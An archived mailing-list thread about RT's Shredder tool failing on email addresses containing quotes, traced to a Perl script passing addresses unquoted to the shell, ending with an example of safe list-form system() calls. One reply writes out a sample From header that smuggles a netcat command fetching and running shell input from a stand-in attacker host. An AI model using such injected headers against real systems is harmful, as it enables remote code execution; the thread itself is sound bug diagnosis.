Spam email question

Shredder doesn’t like when an email address contains either a single- or
double-quote. Understandably so considering this messes with Perl and makes it
look for a closing, matching mark. This makes me wonder if it is possible to
strip these out of the email before it gets inserted as the username/email
address. Doing so would allow me to perform automated user shreds rather than
run my script manually every night.

Mathew

Shredder doesn’t like when an email address contains either a single- or
double-quote. Understandably so considering this messes with Perl and makes it
look for a closing, matching mark. This makes me wonder if it is possible to

I don’t think it is “understandably so”. It is clearly a bug in
shredder… but without seeing the error, I can’t comment further on
what the problem might be.

strip these out of the email before it gets inserted as the username/email
address. Doing so would allow me to perform automated user shreds rather than
run my script manually every night.

This assumes you get no legitimate email addresses with these
characters. These characters are legal in the local part of an email
address (at least the apostrophe is, not 100% sure on the double-quote.)


Shredder doesn’t like when an email address contains either a single-
or double-quote.

An email address, or the name associated with an email address? If it
really is broken enough to get upset when an email address includes
unbalanced quotes, it’s, well, broken; “(*&$%"”@example.com is a
perfectly good email address, as is '^#&!`|@example.com. (Some people
have even used such addresses, and find they don’t get picked up by
spammer scrapeware - a useful property for email addresses to have.)

Even if it’s the associated name, I’d call that somewhat broken. I
know someone who uses “Patrick O’Reilly” as the name portion of his
email address (not coincidentally, that’s his name).

Understandably so considering this messes with Perl and makes it look
for a closing, matching mark.

I find that extremely disturbing, because it implies that RT is
encountering these things in contexts where its string parsing code is
kicking in. This makes me wonder if perhaps a mail bearing a header
like

From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); $dummy = " me@innocent.example.org

would do something nasty. (It would even be legal from an email point
of view.)

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B

It is definitely the email portion and not the RT username portion.
When I get to work tonight I will create a user with an email address
such as the one I describe so I can reproduce the error. I’ll post it here.

Mathew

der Mouse wrote:

I created a user called, for no reason in particular, splat's@thisplace.com.
The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file

The first line is the one I get most often. The second is because it happened to
be the last email address to be shredded. Usually Shredder will spit out the
first line and then move on to the next address at which point, everything will
chug along nicely.

Mathew

der Mouse wrote:

I created a user called, for no reason in particular,
splat's@thisplace.com. The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `''

Eek! It’s a shell reading that?

Perhaps try for date@example.com and see what happens! This could
have pretty hair-raising security implications…

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B

That might be what the problem is actually. I still haven’t figured out how to
use the methods of Shredder in order to run it entirely within the script so
right now Shredder runs as a ‘system’ call.

Mathew

der Mouse wrote:

That might be what the problem is actually. I still haven’t figured
out how to use the methods of Shredder in order to run it entirely
within the script so right now Shredder runs as a ‘system’ call.

Sounds to me like your shell isn’t sufficiently quoting the address
when handing it off; can you post the script?

Cheers,
– jra
Jay R. Ashworth jra@baylink.com
Designer Baylink RFC 2100
Ashworth & Associates The Things I Think '87 e24
St Petersburg FL USA http://baylink.pitas.com +1 727 647 1274

I just went on vacation so as soon as I am able to log into work I’ll
get that for you. It was pointed out that the problem probably is the
shell not handling the single or double quotes. A previous suggestion
was to use an array of parameters and arguments but I’m not certain how
to do this with the rtx-shredder CLI options.

Mathew

Jay R. Ashworth wrote:
> On Thu, Feb 08, 2007 at 11:30:24PM -0500, Mathew Snyder wrote:

That might be what the problem is actually. I still haven’t figured
out how to use the methods of Shredder in order to run it entirely
within the script so right now Shredder runs as a ‘system’ call.

Sounds to me like your shell isn’t sufficiently quoting the address
when handing it off; can you post the script?

Cheers,
– jra
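
The "array of parameters" suggestion mentioned in the thread, as an added example that is not code from any poster or from RT: it contrasts Perl's one-string `system` (handed to `sh -c`, which produces the quoting error reported above) with the list form, which passes the address as a single argument with no shell involved. `echo` stands in for the shredder here, and the rtx-shredder option names shown in the comment are assumptions to check against your installed version.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample addresses; the first is the one reported in the thread.
my @addresses = (
    q{splat's@thisplace.com},
    q{plain@example.org},
);

# Convert system()'s wait status to an exit code (-1 = could not start).
sub exit_code {
    my ($status) = @_;
    return $status == -1 ? -1 : $status >> 8;
}

# String form: when the string contains shell metacharacters (a quote is
# one), perl runs it as: /bin/sh -c "<string>". The shell then tries to
# parse the address, so an unbalanced quote is a syntax error.
sub run_string_form {
    my ($addr) = @_;
    return exit_code(system("echo shredding user $addr"));
}

# List form: perl exec()s the program directly. Each list element becomes
# exactly one argv entry, whatever characters it contains.
sub run_list_form {
    my ($addr) = @_;
    return exit_code(system('echo', 'shredding user', $addr));
}

for my $addr (@addresses) {
    printf "string form exit=%d\n", run_string_form($addr);
    printf "list form   exit=%d\n", run_list_form($addr);
}

# For the real tool the list would look something like this (option and
# plugin argument names are assumptions, not taken from the thread):
#   system('rtx-shredder', '--force', '--plugin', "Users=email,$addr");
```

With the list form the shell never sees the address, but the shredder still parses its own plugin argument string, so characters that are separators in that syntax need checking there separately.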